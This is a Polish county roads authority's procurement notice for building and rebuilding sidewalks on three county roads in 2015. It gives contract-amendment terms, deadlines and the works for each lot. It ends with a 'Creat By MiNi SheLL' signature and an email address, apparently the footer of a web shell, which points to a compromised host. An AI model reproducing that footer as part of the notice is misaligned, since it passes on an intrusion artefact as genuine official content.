­	konieczności wykonania dodatkowych badań i ekspertyz, o czas niezbędny do uzyskania wymaganych decyzji, uzgodnień, badań lub ekspertyz,
­	konieczności wykonania prac lub badań archeologicznych, wykopalisk, powodujących konieczność wstrzymania robót objętych niniejsza umową,
­	realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszających konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań , w tym udzielenie w trakcie realizacji zamówień dodatkowych, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia realizacji, o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych umową,
­	wstrzymania realizacji robot przez uprawniony organ z przyczyn nie zależnych od Wykonawcy,
­	ograniczenia dostępności surowców lub innych materiałów niezbędnych do wykonania przedmiotu zamówienia,
­	wykonania robót dodatkowych lub zamiennych, które będą niezbędne do prawidłowego wykonania i zakończenia robót objętych umowa podstawowa
      Fakty, o których mowa w pkt. 3 .a) muszą mieć istotny wpływ na termin realizacji oraz być stwierdzone przez Inspektora Nadzoru, Kierownika Budowy i zatwierdzone przez Zamawiającego w sporządzonym na tę okoliczność protokole. Strony ustalą nowy termin z uwzględnieniem przerwy w realizacji robót w formie aneksu do umowy. 
Ocena okoliczności mających istotny wpływ na przedłużenie terminu realizacji zamówienia należy wyłącznie do Zamawiającego.

b)	zmiana zakresu rzeczowego  w przypadku gdy:
-   dla prawidłowej realizacji przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy technicznej i   
     obowiązujących przepisów niezbędne jest użycie rozwiązań zamiennych, innych materiałów, parametrów,      
      innego rodzaju robót niż te wskazane w ofercie wykonawcy lub SIWZ nie powodujących wzrostu 
     wynagrodzenia wykonawcy,
-   zmiana ta jest korzystna dla zamawiającego i interesu publicznego - wykonawca bez zwiększania swojego  
     wynagrodzenia zaoferował materiały o znacznie lepszych parametrach niż te wskazane w SIWZ i ofercie, a  które w sposób znaczący poprawią jakość wykonania roboty budowlanej
-   zmiana materiałów budowlanych i  urządzeń, gdy wykorzystanie materiałów budowlanych i urządzeń  
     wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe lub podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie,  pod warunkiem nie zwiększenia ceny. Materiały budowlane, urządzenia i sprzęt posiadać powinny co  najmniej takie same parametry jakościowe jak i cechy użytkowe jak te, które stanowiły podstawę wyboru  oferty.
-   wystąpi konieczność wykonania zamówień dodatkowych nie objętych zamówieniem podstawowych,   niezbędnych do prawidłowego wykonania przedmiotu zamówienia których realizacja spowoduje zmianę w zakresie rzeczowym zam. podstawowego (np. materiały, technologia)
-  wystąpi konieczność wykonania robót dodatkowych w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego wykonania przedmiotu umowy, według zestawienia cen jednostkowych podanych w ofercie.

c)	zmiana przedstawicieli stron - osoby odpowiedzialnej z ramienia Wykonawcy, inspektora nadzoru, w przypadku niemożności pełnienia przez nich powierzonych funkcji (zdarzenie losowe, rezygnacja z pracy, zmiana pracy), pod warunkiem, ze nowe osoby będą spełniać warunki określone SIWZ i Prawie budowlanym.

d)	Zamawiający dopuszcza zmianę podwykonawcy lub rezygnację z udziału podwykonawcy  przy realizacji przedmiotu zamówienia Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach, którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu. Zamawiający dopuści zmianę pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowy podmiot

e)  Zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w 
      interesie Zamawiającego w granicach uzasadnionego interesu Zamawiającego,
f)  Zmiana zapisów umowy wynikające z potrzeby wykonania robót zamiennych w stosunku do robót  planowanych,  jeżeli roboty zamienne uzasadnione są koniecznością zwiększenia bezpieczeństwa robót budowlanych lub usprawnią proces budowlany ,
g) zmiany zapisów umowy wynikające z wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści   umowy 

      4. Niedopuszczalna jest jednak pod rygorem nieważności zmiana postanowień zawartej Umowy oraz wprowadzenie nowych postanowień do Umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy.

     5 .  Zamawiający wymaga udzielenia gwarancji na wykonane roboty na okres minimum 36 miesięcy od daty          odbioru końcowego robót. Bieg okresu gwarancji rozpoczyna się w dniu następnym licząc od daty odbioru  końcowego  robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpopole.bip-gov.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie  Zarządu Dróg Powiatowych w Opolu Lubelskim z siedzibą w Poniatowej, 24-320 Poniatowa, ul. Młodzieżowa 6 pokój nr 1 (sekretariat)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2015 godzina 10:00, miejsce: w siedzibie  Zarządu Dróg Powiatowych w Opolu Lubelskim z siedzibą w Poniatowej, 24-320 Poniatowa, ul. Młodzieżowa 6 pokój nr 1 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa i przebudowa chodników przy drogach powiatowych w 2015 roku wg zadań: Zad. 1- Budowa chodnika przy drodze powiatowej nr 2618 L w m. Dąbrowa Wronowska 
       (w kierunku szkoły) na odcinkach (w kilometrze roboczym) od km 0+183,5 do km 0+238 dł.54,5 m
        i od km  2+065 do km 2+115 długości  50 mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - Budowa chodnika przy drodze powiatowej nr 2618 L w m. Dąbrowa Wronowska 
                           (w kierunku szkoły) na odcinkach (w kilometrze roboczym) od km 0+183,5 do km 0+238        
                           dł.54,5 m i od km  2+065 do km 2+115 długości  50 mb
     W ramach budowy zostaną wykonane następujące roboty: 
      a)  Roboty ziemne:
           -  roboty pomiarowe,
           -  roboty ziemne poprzeczne z wbudowaniem ziemi w nasyp,
           -  rowki pod krawężniki,
           -  formowanie i zagęszczenie nasypów,
b) Krawężniki i obrzeża:
            -  ława pod krawężniki,
            -  krawężniki betonowe 15x30
            -  obrzeża betonowe 6x20 i 8x30
       c) Nawierzchnia chodnika i wjazdów:
           -  podbudowa z gruntu stabilizowanego cementem Rm-1,5 MPa ,gr. 8 cm,
           - chodnik z kostki brukowej  kolorowej gr. 6 cm,
           - podbudowa z gruntu stabilizowanego cementem Rm-5 MPa  gr. 12 cm,
           - wjazdy z kostki brukowej, szarej, gr. 8 cm
           -  humusowanie skarp  z obsianiem trawą,
           - oznakowanie poziome jezdni cienkowarstwowe i pionowe  (przejście dla pieszych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa i przebudowa chodników przy drogach powiatowych w 2015 roku wg zadań:Zad 2 - Przebudowa chodnika przy drodze powiatowej nr 2237 L Poniatowa - Kraczewice - 
                                     Szczuczki na  odcinku  ul. Kraczewickiej w Poniatowej - odcinek długości  507 mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - Przebudowa chodnika przy drodze powiatowej nr 2237 L Poniatowa - Kraczewice - 
                                     Szczuczki na  odcinku  ul. Kraczewickiej w Poniatowej - odcinek długości  507 mb
     W ramach budowy zostaną wykonane następujące roboty: 
      a)  Roboty przygotowawcze i rozbiórkowe:
           -  roboty pomiarowe,
           -  rozebranie obrzeży betonowych 20x6, chodnika z płyt betonowych 35x35x5, krawężnika15x30,
      b)  Roboty ziemne:
           -   wykopy wykonane mechanicznie,
           -  regulacja włazu kanałowego i studzienek telekomunikacyjnych,
      c)  Podbudowa
           -  podbudowa z kruszywa łamanego gr. 20 cm ( wjazdy),
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm-2,5 MPa gr. 15 cm,
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm-1,5 MPa gr. 10 cm,
      d)  Elementy ulic
           - ustawienie  obrzeży betonowych 20x6,  30x8,
           -  ustawienie krawężnika 20x30 na ławie betonowej z oporem, wysokość ok. 17 cm od jezdni
           - chodnik z kostki brukowej  kolorowej gr. 6 cm,
           - wjazdy z kostki brukowej, szarej, gr. 8 cm,
      e)  Roboty wykończeniowe
            -  plantowanie skarp, humusowanie z obsianiem trawą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa i przebudowa chodników przy drogach powiatowych w 2015 roku wg zadań:Zad. 3 - Budowa chodnika przy drodze powiatowej nr 2626 L Wrzelowiec - Kręciszówka - 
                                    Puszno Godowskie od km 0+508,50 do km 0+758,50  dł. 250,00 mb w  m. Puszno
                                    Godowskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 - Budowa chodnika przy drodze powiatowej nr 2626 L Wrzelowiec - Kręciszówka - 
                                    Puszno Godowskie od km 0+508,50 do km 0+758,50  dł. 250,00 mb w  m. Puszno
                                    Godowskie
     W ramach budowy zostaną wykonane następujące roboty: 
      a)  Roboty przygotowawcze i rozbiórkowe:
           -  roboty pomiarowe,
           -  rozebranie podbudowy z kruszywa  gr. 20 cm, rozebranie nawierzchni z mieszanki asfaltowej (przekop),
      b)  Roboty ziemne:
           -   wykopy wykonane mechanicznie,
           -  formowanie i zagęszczenie nasypów,
      c)  Odwodnienie korpusu drogowego:
           -  kanał z rur kanalizacyjnych PEHD o śr. 150 mm ,
           -  studzienka ściekowa o śr. 500 mm z osadnikiem bez syfonu,
       d)  Podbudowa,
           -  podbudowa z kruszywa łamanego gr. 20 cm (przekop),
           -  podbudowa z kruszywa łamanego gr. 15 cm (zjazdy)
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm 1,5 MPa gr. 10 cm,
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm 1,5 MPa gr. 15 cm,
           -  podbudowa z betonu asfaltowego gr, 7 cm (przekop),
       e)  Nawierzchnie:
           -  w-wa ścieralna z betony asfaltowego (przekop),
           - wjazdy z kostki brukowej, szarej, gr. 8 cm,
       f)  Roboty wykończeniowe:
           -  plantowanie skarp z humusowaniem i obsianiem trawą,
           -  umocnienie wylotów przykanalików brukiem,
       g)  Elementy ulic:
           -  ustawienie krawężnika 20x30 na ławie betonowej z oporem,
           -  ustawienie krawężnika 12x25 (zjazdy),
           -  ustawienie obrzeży betonowych 20x6,
           - chodnik z kostki brukowej  kolorowej gr. 6 cm,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com